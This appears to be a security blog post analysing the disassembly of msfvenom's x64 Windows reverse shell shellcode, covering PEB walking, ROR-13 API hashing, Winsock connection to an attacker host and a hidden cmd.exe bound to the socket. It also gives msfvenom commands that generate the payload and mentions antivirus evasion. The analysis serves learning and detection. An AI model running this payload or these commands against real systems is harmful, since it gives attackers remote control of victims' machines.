Analyzing msfvenom's reverse shell payload - Windows
This is my attempt at reverse engineering the shellcode used in msfvenom's x64 reverse shell payload on Windows, and describing how it works.
In this post, I will step through the shellcode used in msfvenom’s stageless reverse shell payload on Windows. While stepping through the shellcode I will explain the different mechanics and system internals used in the shellcode, and try to break it down as simply as possible. By the end of this post, you’ll have a better grasp of Windows internals, common antivirus evasion techniques, as well as a respect for the shellcode craft.
Disclaimer: I did use Anthropic’s Claude to assist in deciphering some parts of the shellcode I analyzed in this post. I did take the effort to validate Claude’s claims, and did not use Claude to generate any content in this post.
Prerequisites
Knowledge
This article assumes you have basic knowledge in assembly, C programming, and Windows System Internals. Where relevant, I’ll try to introduce concepts briefly, but a working familiarity with these topics will make the reading smoother.
Shellcode
As the title mentions, I’m using msfvenom to generate the shellcode I’m analyzing. msfvenom is a free tool offered in the Metasploit Framework. I use the objdump command in Linux to convert the shellcode into assembly instructions.
1
2
3
4
5
# generate windows reverse shell code in binary format
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f raw -o revshell.bin
# decompile the shellcode into human readable assembly instructions.
objdump -D -b binary -M intel -m i386:x86-64 revshell.bin
Rather than reproducing the full shellcode here, I’ll walk through it snippet by snippet so that the focus stays on the analysis. Feel free to generate the shellcode yourself and follow along.
(Optional) Windows 11 VM & WinDbg
I’ve setup a Windows 11 VM to run the shellcode in a debugger. Since Defender has signatures stored for all msfvenom payloads, you’ll need to add an exception in Defender for the directory you plan to store the msfvenom executable. Otherwise, Defender will flag and delete the executable the second it touches the disk.
While analyzing the shellcode, I used WinDbg to help step through some of the instructions. This helped me develop a better understanding of how the shellcode operates. To generate a working payload to run in WinDbg, I had msfvenom create an executable instead of outputting the payload in raw binary format (like I did in the shellcode section).
1
2
# generate windows reverse shell executable to run in WinDbg
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f exe -o revshell.exe
Shellcode analysis
Part 1 - Initial setup
1
2
3
0: fc cld
1: 48 83 e4 f0 and rsp,0xfffffffffffffff0
5: e8 cc 00 00 00 call 0xca
The first few instructions set the shellcode up for execution. We first clear the direction flag in EFLAGS (setting it to 0), forcing string instructions to process data forward (from low to high addresses).
The next instruction aligns the stack to a 16-byte boundary, ensuring stack pointer addresses are multiples of 16. This is a common instruction in x64 assembly, maximizing performance and preventing program crashes.
The last instruction sets our instruction pointer to 0xca (as well as other things). I’ll cover the significance of this instruction more in part 3.
Part 2 - Function address lookup
This function is the meat and bones of how the shellcode works. Without it, we wouldn’t be able to call functions within the Windows API or load additional libraries as needed. It is also the most in-depth part of our analysis, since we’ll also be covering some of the essential parts of how Windows Processes and executables operate.
2.1: Stage 1 - PEB walking & API hashing
In this stage, we’ll parse the Process Environment Block (PEB), and grab a list of the imported DLLs from the Loader Data (Ldr). One at a time, we’ll load a DLL name and ROR-13 hash it to be sent off to Stage 2. The following diagram shows the flow of this process.
2.1.1: Save register values
1
2
3
4
5
6
a: 41 51 push r9
c: 41 50 push r8
e: 52 push rdx
f: 51 push rcx
10: 56 push rsi
11: 48 31 d2 xor rdx,rdx
These first few instructions are pretty simple. Push all the values from the registers we plan to use to the stack, so the registers can be restored to their previous state when the function ends. Lastly, zero out rdx.
2.1.2: Load first DLL name from the Ldr
1
2
3
4
5
14: 65 48 8b 52 60 mov rdx,QWORD PTR gs:[rdx+0x60]
19: 48 8b 52 18 mov rdx,QWORD PTR [rdx+0x18]
1d: 48 8b 52 20 mov rdx,QWORD PTR [rdx+0x20]
21: 48 8b 72 50 mov rsi,QWORD PTR [rdx+0x50]
25: 48 0f b7 4a 4a movzx rcx,WORD PTR [rdx+0x4a]
In Windows x64 assembly, gs is a segment register (the x86 equivalent is fs). Its base address points to the TEB (Thread Environment Block). From the TEB we can access the pointer address for the PEB (Process Environment Block), giving us access to information regarding the current running process. Some of this information includes a list of modules the process imports (including DLLs). The following diagram attempts to visualize how this structure is laid out.
Diagram 2: How the shellcode accesses the PEB, Ldr, and InMemoryOrderModuleList structures.
The first three assembly instructions load an address pointing to our first DLL from the Ldr into the rdx register. From there, we retrieve the BaseDllName and its max length into the rsi and rcx registers using the last two instructions.
This technique is known as PEB walking. It’s commonly used by malicious processes to look up functions in memory since, unlike a normal PE (Portable Executable), shellcode doesn’t have a PE header or import table to reference when looking up functions.
2.1.3: Hash the BaseDllName and go to Stage 2
1
2
3
4
5
6
7
8
9
2a: 4d 31 c9 xor r9,r9
2d: 48 31 c0 xor rax,rax
30: ac lods al,BYTE PTR [rsi]
31: 3c 61 cmp al,0x61
33: 7c 02 jl 0x37
35: 2c 20 sub al,0x20
37: 41 c1 c9 0d ror r9d,0xd
3b: 41 01 c1 add r9d,eax
3e: e2 ed loop 0x2d
Next we’ll zero out the r9 and rax registers. After that, we use the lods instruction to move a single character byte into the al register (lower 8 bits of rax register). This instruction will increment the loop on its own, supplying the next character byte on each iteration of the loop until the end of the string has been reached.
Once we’ve loaded our character byte into the al register, we check to see if it is a lower-case character (a-z). If so, we’ll upper-case the letter (sub al,0x20). This is to eliminate varying naming conventions (i.e. kernel32.dll == Kernel32.Dll == KERNEL32.DLL).
Lastly, we’ll use the ror instruction to rotate the bits in the r9d register (lower 32 bits of r9 register) 13 times (0xd). Once rotated, we’ll fold the character stored in the al register into our hash stored in the r9 register (to match register sizes, r9d and eax are used).
This technique is referred to as ROR-13 hashing. It is used to hide library function names within shellcode and memory, making it harder for antivirus and EDR solutions to statically detect and signature common Windows API functions used in malware.
2.2: Stage 2 - PE export table walking
This section walks over the functions of a DLL, hashing each function name and comparing it to the function hash supplied in the r10 register. If a matching function name cannot be found, it will step to the next DLL in the Ldr and jump back to stage 1. The following diagram highlights the process flow of stage 2:
2.2.1: Load the export directory
1
2
3
4
5
6
7
8
40: 52 push rdx
41: 41 51 push r9
43: 48 8b 52 20 mov rdx,QWORD PTR [rdx+0x20]
47: 8b 42 3c mov eax,DWORD PTR [rdx+0x3c]
4a: 48 01 d0 add rax,rdx
4d: 8b 80 88 00 00 00 mov eax,DWORD PTR [rax+0x88]
53: 48 85 c0 test rax,rax
56: 74 67 je 0xbf
The first two instructions save the Ldr entry and BaseDllName’s hash to the stack for later use. Following that, the base address of the DLL is loaded into the rdx register and the RVA (Relative Virtual Address) for the base of the PE (Portable Executable) Header is loaded into the eax register (lower 32 bits of rax register). The two registers are then combined into the rax register to provide the base address for the PE Header.
After that, the offset for the Export Directory’s RVA (0x88) is stored in the rax register and then tested against itself. If the IMAGE_EXPORT_DIRECTORY structure is not initialized, this will return 0. Meaning the Export Directory is empty.
If the Export Directory is empty, the code will jump to 0xbf. This is where we step to the next DLL in our list and jump back to stage 1.
The following diagram displays the PE Format, and how it pertains to this stage of the address lookup function.
Diagram 4: The PE Format and the function table within the Export Directory.
2.2.2: Prepare ArrayOfNames[] array
1
2
3
4
5
6
58: 48 01 d0 add rax,rdx
5b: 50 push rax
5c: 8b 48 18 mov ecx,DWORD PTR [rax+0x18]
5f: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]
63: 49 01 d0 add r8,rdx
66: e3 56 jrcxz 0xbe
Since the rax register is only an RVA for the Export Directory, we’ll need to add it to the base address for the DLL (rdx register). This is what the first instruction accomplishes, storing the sum in the rax register. Immediately after, we save the rax register to the stack.
We then prepare the AddressOfNames[] array. First, we’ll store the length of the array in the ecx register (lower 32 bits of rcx register), and then store the RVA pointer for the array in the r8d register (lower 32 bits of r8 register). We then combine the two registers to form a base address for the AddressOfNames[] array and store it in the r8 register.
The final instruction, jrcxz, checks if the rcx register’s value equals zero. If so, it will jump to 0xbe where it prepares to load the next DLL, since there are no functions to iterate over. If it’s not zero, then we continue on.
2.2.3: Iterate over the AddressOfNames[] array and compare to the supplied function hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
66: e3 56 jrcxz 0xbe
68: 48 ff c9 dec rcx
6b: 41 8b 34 88 mov esi,DWORD PTR [r8+rcx*4]
6f: 48 01 d6 add rsi,rdx
72: 4d 31 c9 xor r9,r9
75: 48 31 c0 xor rax,rax
78: ac lods al,BYTE PTR [rsi]
79: 41 c1 c9 0d ror r9d,0xd
7d: 41 01 c1 add r9d,eax
80: 38 e0 cmp al,ah
82: 75 f1 jne 0x75
84: 4c 03 4c 24 08 add r9,QWORD PTR [rsp+0x8]
89: 45 39 d1 cmp r9d,r10d
8c: 75 d8 jne 0x66
I’ve included the last instruction from the previous section (jrcxz 0xbe), since it plays a role in the loop covered in this section. The next instruction decrements the value in the rcx register by one. Essentially, this loop is going over the AddressOfNames[] array backwards.
We begin our loop by grabbing the RVA pointer of the next function name, and moving it into the esi register (lower 32 bits of rsi register). We then add the RVA to the DLL’s base address, and store it in the rsi register. Next we ROR-13 hash the function name in the rsi register and place the hash in the r9 register like we did in stage 1 with the BaseDllName. But, we use cmp al,ah instead to check for the null-byte terminator (end of string indicator).
Once the function name has been hashed, we then combine it with the BaseDllName hash we stored on the stack at the beginning of stage 2 and store it in the r9 register. Finally, we compare this newly calculated hash with the hash provided in the r10 register (r9d and r10d are used to compare the lower 32 bits of r9 and r10 registers).
If the hash doesn’t match, we jump back to the beginning of our loop at 0x66, and once again check if the value in the rcx register is zero. Otherwise, we continue on and retrieve the matching function’s address from the AddressOfFunctions[] array.
2.2.4: Retrieve address for matched function
1
2
3
4
5
6
7
8
8e: 58 pop rax
8f: 44 8b 40 24 mov r8d,DWORD PTR [rax+0x24]
93: 49 01 d0 add r8,rdx
96: 66 41 8b 0c 48 mov cx,WORD PTR [r8+rcx*2]
9b: 44 8b 40 1c mov r8d,DWORD PTR [rax+0x1c]
9f: 49 01 d0 add r8,rdx
a2: 41 8b 04 88 mov eax,DWORD PTR [r8+rcx*4]
a6: 48 01 d0 add rax,rdx
Once a matching hash is found, our next step is to use the index stored in the rcx register to retrieve the ordinal from the AddressOfOrdinals[] array that points to the function’s address in the AddressOfFunctions[] array. The first 4 instructions do just this, loading the AddressOfOrdinals[] base address into the r8 register and assigning the ordinal we’re looking for to the cx register (lower 16 bits of rcx register).
We then load the AddressOfFunctions[] array’s base address into the r8 register and retrieve the RVA for our hashed function and store it in the eax register (lower 32 bits of rax register). The final instruction takes the function’s RVA and adds it to the DLL’s base address, storing our function’s base address in the rax register.
2.2.5: Call the matched function
1
2
3
4
5
6
7
8
9
10
11
a9: 41 58 pop r8
ab: 41 58 pop r8
ad: 5e pop rsi
ae: 59 pop rcx
af: 5a pop rdx
b0: 41 58 pop r8
b2: 41 59 pop r9
b4: 41 5a pop r10
b6: 48 83 ec 20 sub rsp,0x20
ba: 41 52 push r10
bc: ff e0 jmp rax
The first two instructions delete the values pushed to the stack in the beginning of stage 2.
Instructions 0xad to 0xb2 restore the values to the registers that we pushed to the stack in the beginning of stage 1.
From part 3 onwards, you’ll see a reoccurring function call, call rbp. That is calling this function we’ve been covering in part 2. When you use the call instruction in assembly, it saves the next instruction’s pointer address to the stack so the function we’re calling knows where to return execution when it’s finished. It then jumps to the address in the operand. Instruction 0xb4 is retrieving this address the call instruction leaves on the stack.
Then we grow the stack by 32 bytes, and push the return address back to the stack and jump to the function address we found in the AddressOfFunctions[] array. These last two instructions mimic the call instruction, as described in the last paragraph.
2.2.6: Jump point for preparing to go back to stage 1
1
2
3
4
5
be: 58 pop rax
bf: 41 59 pop r9
c1: 5a pop rdx
c2: 48 8b 12 mov rdx,QWORD PTR [rdx]
c5: e9 57 ff ff ff jmp 0x21
This last part is used to prepare our jump back to stage 1. The first two instructions delete the last two values we pushed to the stack (since the rax and r9 registers get zeroed-out in stage 1).
Now we restore the Ldr entry we saved in the beginning of stage 2 back to the rdx register. We then move the pointer address stored in the flink located in our current Ldr entry (refer to Diagram 2), pointing to our next DLL, into the rdx register and jump back down to stage 1 to hash and search again.
Part 3 - Connect to attacker machine (via Winsock)
In this part, we’ll configure Winsock and setup a reverse TCP connection to our attacker machine.
3.1: Configure rbp to point to address lookup function
1
2
3
4
5: e8 cc 00 00 00 call 0xd6
a: 41 51 push r9
...
ca: 5d pop rbp
I’ve included the instructions at 0x5 and 0xa. What the call instruction at 0x5 did was push 0xa to the stack. This is the pointer for our address lookup function we covered in part 2. 0xca assigns our address lookup function’s address to the rbp register.
The rbp register is normally used for determining the base of our stack, but we’ll be using it as placeholder for the address we use to call our function from part 2 with.
3.2: Create SOCKADDR_IN struct & call LoadLibraryA(“ws2_32”)
1
2
3
4
5
6
7
8
9
10
11
12
13
cb: 49 be 77 73 32 5f 33 movabs r14,0x32335f327377
d2: 32 00 00
d5: 41 56 push r14
d7: 49 89 e6 mov r14,rsp
da: 48 81 ec a0 01 00 00 sub rsp,0x1a0
e1: 49 89 e5 mov r13,rsp
e4: 49 bc 02 00 11 5c 7f movabs r12,0x100007f5c110002
eb: 00 00 01
ee: 41 54 push r12
f0: 49 89 e4 mov r12,rsp
f3: 4c 89 f1 mov rcx,r14
f6: 41 ba 4c 77 26 07 mov r10d,0x726774c
fc: ff d5 call rbp
We will now move the string 0x32335f327377 (converts to “ws2_32\0”) into the r14 register. This string is the name used when importing the Winsock library. We’ll need this library’s functions to connect a shell process back to our attacker machine.
Now we’ll push the r14 register to the stack, then move the stack pointer (pointing to our string) back into the r14 register. We do this because the argument for LoadLibraryA requires a pointer to a string, which this technically is.
We then grow our stack by 416 bytes (0x1a0), and push our new stack pointer to the r13 register.
Next, we move our SOCKADDR_IN structure to the r12 register. Our struct looks something like this in memory:
Diagram 5: SOCKADDR_IN structure.
Address family is stored in memory as little-endian, like most other values in x86 architecture. This equals out to AF_INET (0x0002), and should always be AF_INET.
Since port and IP address are used by the network stack, they need to be stored in memory as big-endian. It is confusing to decipher at first, but easier as you become more familiar with it.
Like our “ws2_32” string in the r14 register, we’ll push the r12 register holding our SOCKADDR_IN structure to the stack and move the stack pointer into the r12 register. This creates a pointer to our SOCKADDR_IN structure.
We’ll now move the pointer to our “ws2_32” string in the r14 register into the rcx register, since rcx holds the first argument for a function. Then we’ll move the hash 0x726774c into the r10d register (lower 32 bits of r10 register). This hash is the ROR-13 hash of the LoadLibraryA function.
Finally, we call our address lookup function. This will match our hash for LoadLibraryA, find its address in memory, then jump to it with a pointer to our “ws2_32” string as the only argument in the rcx register.
3.3: Call WSAStartup()
1
2
3
4
5
fe: 4c 89 ea mov rdx,r13
101: 68 01 01 00 00 push 0x101
106: 59 pop rcx
107: 41 ba 29 80 6b 00 mov r10d,0x6b8029
10d: ff d5 call rbp
In the last section, we grew the stack 416 bytes and pushed the stack pointer into the r13 register. We will now move this pointer into the rdx register. Then we will push the value 0x101 to the stack, and immediately pop it into the rcx register.
Now it’s time for us to load the hash for the WSAStartup function into the r10d register (lower 32 bits of the r10 register) and call the function.
The first argument (rcx register) of the WSAStartup function uses a WORD value to specify which Windows Sockets version should be used. The higher byte stores the minor version number and the lower byte stores the major version number. In our shellcode, we are loading version 1.1 of Windows Sockets.
The second argument (rdx register) is the pointer address where WSAStartup will store the WSADATA structure on the stack. This will hold information necessary for utilizing the Windows Sockets API.
3.4: Call WSASocketA()
1
2
3
4
5
6
7
8
9
10
10f: 50 push rax
110: 50 push rax
111: 4d 31 c9 xor r9,r9
114: 4d 31 c0 xor r8,r8
117: 48 ff c0 inc rax
11a: 48 89 c2 mov rdx,rax
11d: 48 ff c0 inc rax
120: 48 89 c1 mov rcx,rax
123: 41 ba ea 0f df e0 mov r10d,0xe0df0fea
129: ff d5 call rbp
We will now create the socket for our network connection using the WSASocketA function. This function takes in more than six arguments, so we’ll need to utilize the stack to handle the last two arguments.
At this point, the rax register should equal 0x0. The first instruction will set the dwFlags argument to 0x0, meaning no flags will be set. The second instruction sets the g argument to 0x0 as well, meaning no group operations are performed. We utilize the stack to pass these arguments to the WSASocketA function. Since the stack is LIFO (Last In First Out) we need to pass the dwFlags argument first, since it is the last argument. Then we’ll push the g argument.
Next we will zero-out the r8 and r9 registers. This will set the protocol and lpProtocolInfo arguments to NULL. We then increment the rax register and assign that value to rdx register, equaling 0x1. This will set the type argument to SOCK_STREAM. We once again increment the rax register and assign that value to rcx register, equaling 0x2. This will set the af argument to AF_INET.
Once this is all set, we now load the hash for the WSASocketA function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function should return a handle for the new socket in the rax register.
3.5: Connect to the attacker host
1
2
3
4
5
6
7
12b: 48 89 c7 mov rdi,rax
12e: 6a 10 push 0x10
130: 41 58 pop r8
132: 4c 89 e2 mov rdx,r12
135: 48 89 f9 mov rcx,rdi
138: 41 ba 99 a5 74 61 mov r10d,0x6174a599 <- connect()
13e: ff d5 call rbp
First, we move our winsock handle returned by the last function into the rdi register. We then load 0x10 (16 in decimal) to the r8 register. This will serve as the length of our SOCKADDR_IN structure. Then we will move the SOCKADDR_IN structure into the rdx register, and move our socket handle into the rcx register.
Then we will load the hash for the Winsock connect function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function will return zero.
Part 4 - Spawn a shell
In this part, we spawn a cmd.exe shell with STDIN/STDOUT/STDERR pointing to our socket handle. We then wait for the newly created process to terminate and gracefully exit our shellcode.
4.1: Call CreateProcessA() to open cmd.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
140: 48 81 c4 40 02 00 00 add rsp,0x240
147: 49 b8 63 6d 64 00 00 movabs r8,0x646d63
14e: 00 00 00
151: 41 50 push r8
153: 41 50 push r8
155: 48 89 e2 mov rdx,rsp
158: 57 push rdi
159: 57 push rdi
15a: 57 push rdi
15b: 4d 31 c0 xor r8,r8
15e: 6a 0d push 0xd
160: 59 pop rcx
161: 41 50 push r8
163: e2 fc loop 0x161
165: 66 c7 44 24 54 01 01 mov WORD PTR [rsp+0x54],0x101
16c: 48 8d 44 24 18 lea rax,[rsp+0x18]
171: c6 00 68 mov BYTE PTR [rax],0x68
174: 48 89 e6 mov rsi,rsp
177: 56 push rsi
178: 50 push rax
179: 41 50 push r8
17b: 41 50 push r8
17d: 41 50 push r8
17f: 49 ff c0 inc r8
182: 41 50 push r8
184: 49 ff c8 dec r8
187: 4d 89 c1 mov r9,r8
18a: 4c 89 c1 mov rcx,r8
18d: 41 ba 79 cc 3f 86 mov r10d,0x863fcc79 <- CreateProcessA()
193: ff d5 call rbp
This is gonna be a long and in-depth section, so I’ll hop right into it. First thing we do is shrink our stack. This will give us a clean slate to work with, while also keeping any necessary structures still in place. Then we’ll move the string “cmd\0” into the r8 register, setting the remaining bytes in the register to 0x00. We then push the string in the r8 register to the stack twice. Once for somewhere to reference via a pointer, and another time to add padding. We then move the string’s address to the rdx register. We will use the “cmd” string to tell CreateProcessA that we want to open a cmd.exe shell.
Next, we’re going to work on creating our STARTUPINFO and PROCESS_INFORMATION structures on the stack. We start by taking our socket handle stored in the rdi register, and pushing it to the stack three times. These will act as our STDIN, STDOUT, and STDERR handles in the STARTUPINFO structure. This means we’ll be receiving all input from and sending all output and errors to our attacker machine via our reverse TCP connection.
Now, we’re going to provision the rest of our STARTUPINFO and PROCESS_INFORMATION structure’s memory on the stack. We do this by zeroing out the r8 register. Next we set the rcx register to 0xd (13 in decimal). We’ll then push the r8 register to the stack 13 times with the loop instruction. What this does is push 13 QWORDs (104 bytes) worth of null-bytes to the stack.
With the three handles we’ve already pushed to the stack, as well as 104 null-bytes we’ve provisioned on the stack, this represents the STARTUPINFO and PROCESS_INFORMATION structures. To get a better understanding of what this looks like in memory, please refer to Diagram 6 below:
Diagram 6: How PROCESS_INFORMATION and STARTUPINFO structures are laid out in the stack.
Before we proceed with aligning our arguments for CreateProcessA on the stack and appropriate registers, we must set a couple of the member values in our STARTUPINFO structure. First, we set the STARTUPINFO.dwFlags member to 0x101. This sets the STARTF_USESTDHANDLES (0x100) flag, which tells CreateProcessA to use the hStdInput/Output/Error fields, and the STARTF_USESHOWWINDOW (0x001) flag, which hides the cmd.exe window so it spawns invisibly (no console popup). We then load the address for our STARTUPINFO structure (rsp+0x18) into the rax register, and set the STARTUPINFO.cb member’s value to 0x68 (104 in decimal). STARTUPINFO.cb is the first member in our STARTUPINFO structure, and is responsible for holding the byte length of the structure.
We then load the PROCESS_INFORMATION structure’s address (located at rsp+0x00) into the rsi register. This structure will be responsible for holding the process and thread handles for our newly spawned cmd.exe process, as well as its process and thread IDs.
Since the stack is last-in-first-out, we’ll need to push our CreateProcessA arguments to the stack in reverse. So we push our lpProcessInformation argument in the rsi register first, followed by our lpStartupInfo argument in the rax register. Since the r8 register is still zero, lpCurrentDirectory, lpEnvironment, and dwCreationFlags will be set to zero. We then increment the r8 register by 0x1 so that we can set bInheritHandles to true. We then decrease the r8 register back to zero, and move the value into the r9 and rcx registers. This will set lpApplicationName, lpProcessAttributes, lpThreadAttributes all to zero as well. CreateProcessA’s arguments should look something like this (Note that the first 4 args represent rcx, rdx, r8, and r9 on the stack (aka shadow space)):
1
2
3
4
5
6
7
8
9
10
11
RSP+0x08 (rcx): lpApplicationName = NULL (not used)
RSP+0x10 (rdx): lpCommandLine = ptr to "cmd\0" (spawn cmd.exe)
RSP+0x18 (r8): lpProcessAttributes = NULL
RSP+0x20 (r9): lpThreadAttributes = NULL
RSP+0x28: bInheritHandles = TRUE (0x1) (socket handle inherited)
RSP+0x30: dwCreationFlags = 0 (default)
RSP+0x38: lpEnvironment = NULL (inherit parent environment)
RSP+0x40: lpCurrentDirectory = NULL (inherit cwd)
RSP+0x48: lpStartupInfo = ptr to STARTUPINFO (holds socket & process creation flags)
RSP+0x50: lpProcessInformation = ptr to PROCESS_INFORMATION (receive hProcess & hThread handles)
We now load the hash for the CreateProcessA function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function should return a non-zero value and our cmd.exe process should be running with STDIN/STDOUT/STDERR pointing to our reverse TCP shell.
4.2: Call WaitForSingleObject()
1
2
3
4
5
195: 48 31 d2 xor rdx,rdx
198: 48 ff ca dec rdx
19b: 8b 0e mov ecx,DWORD PTR [rsi]
19d: 41 ba 08 87 1d 60 mov r10d,0x601d8708 <- WaitForSingleObject()
1a3: ff d5 call rbp
After calling CreateProcessA, we need to tell our shellcode to wait for the cmd.exe process to finish, or else we’ll exit our process prematurely. This is what WaitForSingleObject does.
We start by zeroing out the rdx register, then decrementing it by 1. This will set the value of the rdx register to -1, telling WaitForSingleObject to wait indefinitely for the cmd.exe process to finish. Then we move the address in the rsi register, pointing to the dereferenced process handle in our PROCESS_INFORMATION structure, into the ecx register (lower 32 bits of rcx).
We now load the hash for the WaitForSingleObject function into the r10d register (lower 32 bits of the r10 register) and call the function. The function’s return value depends on how the process terminates.
4.3: Call GetVersion() and exit process
1
2
3
4
5
6
7
8
9
10
11
12
13
14
1a5: bb f0 b5 a2 56 mov ebx,0x56a2b5f0 <- one version of ExitProcess()
1aa: 41 ba a6 95 bd 9d mov r10d,0x9dbd95a6 <- GetVersion()
1b0: ff d5 call rbp
1b2: 48 83 c4 28 add rsp,0x28
1b6: 3c 06 cmp al,0x6
1b8: 7c 0a jl 0x1c4
1ba: 80 fb e0 cmp bl,0xe0
1bd: 75 05 jne 0x1c4
1bf: bb 47 13 72 6f mov ebx,0x6f721347 <- (ntdll.dll->RtlExitUserThread()) == ExitThread())
1c4: 6a 00 push 0x0
1c6: 59 pop rcx
1c7: 41 89 da mov r10d,ebx
1ca: ff d5 call rbp
We’re now in the final section of our shellcode. We start by loading the hash for ExitProcess function into the ebx register. We then load the hash for GetVersion and call the function. This will return a major and minor version number, along with some other information. But we only need the major version in the low-order byte of the rax register (the al register).
We then cleanup the shadow space (40 bytes) left behind from when we called CreateProcessA off of the stack.
We now compare the al register to 0x6. We do this see which version of Windows we’re running on. If we’re running on Windows Vista or higher, we continue on. Otherwise, we jump down to 0x1c4, where we prepare to exit the shellcode.
Now this next bit of shellcode at 0x1ba confused me, and I can’t find a good answer for it. But the comparison seems to be something that should always be false. Meaning the instruction at 0x1bf should be dead code, since it can never be reached. If you can find a good reason for this, please email me! I’d love to know.
Anyways, we set the rcx register to 0x0, then move the hash for the ExitProcess function into the r10d register (lower 32 bits of the r10 register) and call the function. This tells Windows that the shellcode process has terminated successfully.
Conclusion
We’ve covered a lot of ground in this post. We were able to analyze how shellcode walks the PEB and ROR-13 hashes dll’s and their individual functions, then compares those hashes to a user-supplied value and returns the appropriate pointer address for a requested function. We then watched how we can create a reverse TCP connection socket to our attacker machine, and spawn a cmd.exe process that communicates over that socket handle. Once finished with the process, we observed how the shellcode gracefully exits.
Even though Microsoft Defender is able to statically detect this shellcode, with enough manipulating and rearranging, it could be possible to bypass static detection. Though, the techniques covered in this post (PEB Walking, API Hashing, dynamic function resolution) would most likely be picked up by modern endpoint detection solutions. Understanding how shellcode works is valuable for both offensive and defensive security teams. Hopefully this post gave you a solid foundation for recognizing these patterns when you encounter them in the wild.
Sources
I was able to learn more about the Windows System Internals topics within this post via the following blog posts:
Find DLL base addresses from PEB: https://rootfu.in/how-to-part-1-find-dllbase-address-from-peb-in-x64-assembly/
LDR_DATA_TABLE_ENTRY structure reference: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntldr/ldr_data_table_entry.htm
Linked Lists: https://bsodtutorials.blogspot.com/2013/10/linked-lists-flink-and-blink.html
PE Header structure: https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/
Location of the Export Directory Table in a PE: https://xen0vas.github.io/Win32-Reverse-Shell-Shellcode-part-2-Locate-the-Export-Directory-Table/#
